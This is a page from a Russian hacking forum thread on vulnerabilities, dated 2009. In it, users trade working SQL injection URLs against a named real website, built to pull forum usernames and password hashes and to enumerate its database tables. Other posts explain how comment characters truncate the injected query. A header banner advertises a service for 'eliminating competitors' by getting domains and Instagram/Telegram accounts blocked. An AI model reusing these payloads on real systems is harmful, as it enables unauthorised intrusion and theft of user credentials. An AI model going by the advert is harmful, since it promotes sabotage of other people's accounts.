Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 524 из 1393

524

Опции темы

Поиск в этой теме

Опции просмотра

#5231

01.02.2009, 00:47

Qam

Познающий

Регистрация: 16.01.2009

Сообщений: 40

Провел на форуме:
244040

Репутация: 15

Фильтрация таким образом не повличет ли за собой уязвимости?
$style_text = htmlspecialchars(trim($HTTP_POST_VARS['style_text']));

#5232

01.02.2009, 00:48

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

Для cpg_users table_schema=KOLESHEV_1

но

http://teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19+from+KOLESHEV_1.cpg_users+--+

command denied to user ..

зато можешь посмотреть юзеров форума

http://teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,concat_ws(0x2F,username,user_ password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+ from+phpbb_users+limit+1,1+--+

#5233

01.02.2009, 00:50

diznt

Постоянный

Регистрация: 31.01.2008

Сообщений: 643

Провел на форуме:
6128108

Репутация: 445

ElteRUS вопрос
почему в конце +--+ ставиться? или к примеру -- или /* ? Я просто не понимаю а ставлю --

#5234

01.02.2009, 00:59

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

diznt, потому что согласно документации mysql после -- должен идти пробел

А почему вообще ставится ? Это знаки комментария. Нужны для того что-бы обрубить продолжения запроса, когда мы всовываемся в него со своей инъекцией

Последний раз редактировалось ElteRUS; 01.02.2009 в 01:04..

#5235

01.02.2009, 01:00

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от diznt

ElteRUS вопрос
почему в конце +--+ ставиться? или к примеру -- или /* ? Я просто не понимаю а ставлю --

Не думай об этом)) Делай так. Составил запрос. Ошибка? Пробуешь --. не пашет? Пробуешь /*. Не пашет? Пробуешь +--+. Снова не пашет? Ну на кройняк ++-- =))

#5236

01.02.2009, 01:03

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Цитата:

почему в конце +--+ ставиться? или к примеру -- или /* ? Я просто не понимаю а ставлю --

Все что идёт после этих символов запросом не считается (как // в пхп)

#5237

01.02.2009, 01:05

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

diznt, советую почитать http://forum.antichat.ru/thread43966.html

#5238

01.02.2009, 01:06

oRb

Members of Antichat - Level 5

Регистрация: 09.05.2008

Сообщений: 304

Провел на форуме:
7875940

Репутация: 2362

1. Открывать коммент там и не надо, тк запрос тупо SELECT * FROM news_posts WHERE news_id =$id

2. ElteRUS, доступ к cpg_users есть, просто бд надо писать имя бд прописью, а не капсом
http://teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19+from+koleshev_1.cpg_users

Для подтверждения:
http://teambuilding-extreme.com/news/login.php?id=1+union+select+1,2,3,concat_ws(0x2F,T ABLE_NAME,TABLE_SCHEMA,database()),5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19+from+information_schema.T ABLES+where+TABLE_SCHEMA=database()+AND+TABLE_NAME +like+0x257573657225+limit+3,1

А не выдает ничего, потому что таблица пустая.

Попробуйте у себя на локалхосте выполнить
SELECT 1,2,3 FROM information_schema.VIEWS
все сразу вам понятно станет.

#5239

01.02.2009, 01:09

diznt

Постоянный

Регистрация: 31.01.2008

Сообщений: 643

Провел на форуме:
6128108

Репутация: 445

как я понял почитав кусочек статьи "--" это типа обозначение комента (то есть отбрасывает все что после него)

Но зачем он нужен все таки не понятно!

#5240

01.02.2009, 01:14

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Цитата:

Но зачем он нужен все таки не понятно!

Смотри, может быть запрос вида

Цитата:

SELECT * FROM news_posts WHERE news_id = 1+union+select+1,2,3,4,5 news_name = $name

Если будет такой запрос - мускуль выдаст ошибку, потому что посчитает news_name лишним, а если поставить запрос так

Цитата:

SELECT * FROM news_posts WHERE news_id = 1+union+select+1,2,3,4,5 /* news_name = $name

то news_name = $name считатся не будет.

Это пример =)

Страница 524 из 1393

524

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход